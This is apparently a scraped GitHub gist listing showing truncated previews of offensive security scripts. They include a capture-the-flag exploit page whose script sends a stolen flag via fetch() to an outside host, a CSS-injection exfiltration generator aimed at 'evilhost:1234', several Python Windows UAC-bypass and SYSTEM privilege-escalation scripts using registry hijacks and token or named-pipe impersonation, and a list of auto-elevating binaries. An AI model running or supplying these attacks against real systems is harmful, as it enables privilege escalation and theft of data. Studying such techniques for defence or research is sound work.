| Sleep | Binary |
|---|---|
| 15 | 1111 |
| 14 | 1110 |
| 13 | 1101 |
| 12 | 1100 |
| 11 | 1011 |
| 10 | 1010 |
| 9 | 1001 |
| 8 | 1000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <iframe id="ifr0" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe> | |
| <iframe id="ifr1" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe> | |
| <script> | |
| window.addEventListener('hashchange', (evt) => { | |
| const flag = evt.newURL.match(/CTF-BR\{.*\}/)[0] | |
| fetch(`//tool.tonkatsu.info/?flag=${encodeURIComponent(flag)}`) | |
| }) | |
| </script> |
makelariss
/ drunk.md
Last active
June 10, 2020 17:07
makelariss
/ gen_css.py
Created
January 3, 2020 16:48
— forked from vladvis/gen_css.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import requests | |
| host = 'evilhost:1234' | |
| start_template = 'input.sgn[value^="%02x"]{content:url(http://'+host+'/s/%02x);}' | |
| triple_template = 'input.sgn[value*="%03x"]~button{--p%s:url(http://'+host+'/q/%03x);}' | |
| timestamp_template = 'input.timestamp[value="%s"]{background:url(http://'+host+'/t/%s);}' | |
| frames = '''button{animation:l1 35s;} |
makelariss
/ uacbypassEnviromentVariableExpansion.py
Last active
June 17, 2021 21:13
Tested on Microsoft Windows [Version 10.0.16299.248]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html | |
| ''' | |
| SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting. | |
| It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment) | |
| We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task. | |
| ''' | |
| from _winreg import * | |
| HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) |
makelariss
/ popshellslikeitsafriday.py
Last active
December 17, 2021 05:31
NT AUTHORITY\SYSTEM through Named Pipe Impersonation using Python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |
makelariss
/ uacbypasscompmgmtlauncher_exe.py
Last active
September 30, 2019 17:33
Tested on Microsoft Windows [Version 6.1.7601]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to https://github.com/mrfuzzy8/Scripts/blob/master/Invoke-CompMgmtLauncherBypass.ps1 += https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ | |
| ''' | |
| CompMgmtLauncher.exe is an auto-elevated binary that is vulnerable to Image Hijack on the .msc file extension. | |
| Read access to HKCU\Software\Classes\mscfile\shell\open\command is perfomed with "mmc.exe" as a default value which then invokes eventvwr.msc,if “NAME NOT FOUND” it goes to HKCR\mscfile\shell\open\command. | |
| Due to the registry key being accessible from user mode once we inject can inject an arbitray file to be executed with High IL. | |
| ''' | |
| from _winreg import * | |
| HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) |
makelariss
/ popshellslikeitsasaturday.py
Last active
October 14, 2020 00:21
NT AUTHORITY\SYSTEM through Token Impersonation using Python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| # All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |
makelariss
/ uacbypasstokenmanipulation.py
Last active
February 29, 2024 19:21
Fileless AlwaysNotify UAC Bypass using CIA Vault7's Token Manipulation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
| # This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32' , use_last_error=True) |
makelariss
/ uacbypassSlui_exe.py
Last active
September 30, 2019 17:34
Tested on Microsoft Windows [Version 10.0.16299.192]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation | |
| ''' | |
| slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking. | |
| Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution. | |
| Due to the registry key being accessible from user mode, an arbitrary executable file can be injected. | |
| ''' | |
| from _winreg import * | |
| HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) |
makelariss
/ autoelevate.lst
Created
December 16, 2017 15:10
All Windows 10 RS3 [Version 10.0.16299] Binaries with <autoElevate></autoElevate> set to True
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| C:\Windows\System32\bthudtask.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\changepk.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\ComputerDefaults.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\dccw.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\dcomcnfg.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\DeviceEject.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\DeviceProperties.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\djoin.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\easinvoker.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\EASPolicyManagerBrokerHost.exe: <autoElevate>true</autoElevate> |
NewerOlder